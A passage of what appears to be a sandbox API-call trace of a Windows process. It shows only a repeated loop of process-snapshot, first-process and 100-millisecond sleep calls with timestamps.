th32ProcessID=0x0) returned 0x218c [0162.157] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.251] Sleep (dwMilliseconds=0x64) [0162.267] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0162.284] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.447] Sleep (dwMilliseconds=0x64) [0162.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0162.472] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.570] Sleep (dwMilliseconds=0x64) [0162.575] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0162.585] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.679] Sleep (dwMilliseconds=0x64) [0162.686] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0162.702] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.790] Sleep (dwMilliseconds=0x64) [0162.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0162.808] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.898] Sleep (dwMilliseconds=0x64) [0162.903] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0162.915] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.006] Sleep (dwMilliseconds=0x64) [0163.013] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0163.025] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.129] Sleep (dwMilliseconds=0x64) [0163.140] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0163.158] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.292] Sleep (dwMilliseconds=0x64) [0163.299] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0163.315] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.440] Sleep (dwMilliseconds=0x64) [0163.450] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0163.471] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.566] Sleep (dwMilliseconds=0x64) [0163.578] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0163.595] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.676] Sleep (dwMilliseconds=0x64) [0163.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0163.698] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.772] Sleep (dwMilliseconds=0x64) [0163.780] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0163.790] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.871] Sleep (dwMilliseconds=0x64) [0163.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0163.909] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.987] Sleep (dwMilliseconds=0x64) [0164.001] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0164.018] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.128] Sleep (dwMilliseconds=0x64) [0164.140] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0164.158] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.255] Sleep (dwMilliseconds=0x64) [0164.265] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0164.283] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.481] Sleep (dwMilliseconds=0x64) [0164.504] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0164.519] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.643] Sleep (dwMilliseconds=0x64) [0164.653] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0164.666] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.744] Sleep (dwMilliseconds=0x64) [0164.747] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0164.756] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.836] Sleep (dwMilliseconds=0x64) [0164.841] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0164.858] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.955] Sleep (dwMilliseconds=0x64) [0165.022] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0165.038] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.193] Sleep (dwMilliseconds=0x64) [0165.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0165.211] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.476] Sleep (dwMilliseconds=0x64) [0165.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0165.491] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.598] Sleep (dwMilliseconds=0x64) [0165.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0165.689] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.775] Sleep (dwMilliseconds=0x64) [0165.782] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0165.801] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0165.900] Sleep (dwMilliseconds=0x64) [0165.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0165.926] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.017] Sleep (dwMilliseconds=0x64) [0166.031] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0166.049] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.151] Sleep (dwMilliseconds=0x64) [0166.172] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0166.189] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.303] Sleep (dwMilliseconds=0x64) [0166.309] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x218c [0166.331] Process32First (in: hSnapshot=0x218c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.458] Sleep (dwMilliseconds=0x64) [0166.486] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0166.504] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.595] Sleep (dwMilliseconds=0x64) [0166.609] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0166.627] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.740] Sleep (dwMilliseconds=0x64) [0166.746] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0166.761] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.867] Sleep (dwMilliseconds=0x64) [0166.872] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0166.885] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0166.971] Sleep (dwMilliseconds=0x64) [0166.987] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0167.009] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.110] Sleep (dwMilliseconds=0x64) [0167.125] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0167.149] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.242] Sleep (dwMilliseconds=0x64) [0167.247] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0167.257] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.335] Sleep (dwMilliseconds=0x64) [0167.342] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0167.352] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.466] Sleep (dwMilliseconds=0x64) [0167.510] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0167.522] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.616] Sleep (dwMilliseconds=0x64) [0167.624] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0167.643] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.728] Sleep (dwMilliseconds=0x64) [0167.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0167.745] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.840] Sleep (dwMilliseconds=0x64) [0167.861] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0167.877] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.976] Sleep (dwMilliseconds=0x64) [0168.033] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0168.059] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.160] Sleep (dwMilliseconds=0x64) [0168.172] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0168.191] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.274] Sleep (dwMilliseconds=0x64) [0168.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0168.293] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.416] Sleep (dwMilliseconds=0x64) [0168.420] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0168.439] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.584] Sleep (dwMilliseconds=0x64) [0168.600] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0168.619] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.708] Sleep (dwMilliseconds=0x64) [0168.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0168.729] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.816] Sleep (dwMilliseconds=0x64) [0168.825] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0168.839] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0168.931] Sleep (dwMilliseconds=0x64) [0168.937] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0168.955] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.048] Sleep (dwMilliseconds=0x64) [0169.063] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0169.073] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.283] Sleep (dwMilliseconds=0x64) [0169.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2180 [0169.308] Process32First (in: hSnapshot=0x2180, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.424] Sleep (dwMilliseconds=0x64) [0169.468] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2100 [0169.510] Process32First (in: hSnapshot=0x2100, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.680] Sleep (dwMilliseconds=0x64) [0169.703] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0169.718] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.798] Sleep (dwMilliseconds=0x64) [0169.812] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0169.829] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0169.923] Sleep (dwMilliseconds=0x64) [0169.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0169.949] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.044] Sleep (dwMilliseconds=0x64) [0170.063] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0170.084] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.205] Sleep (dwMilliseconds=0x64) [0170.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0170.236] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.385] Sleep (dwMilliseconds=0x64) [0170.393] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0170.407] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.492] Sleep (dwMilliseconds=0x64) [0170.499] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12cc [0170.517] Process32First (in: hSnapshot=0x12cc, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, 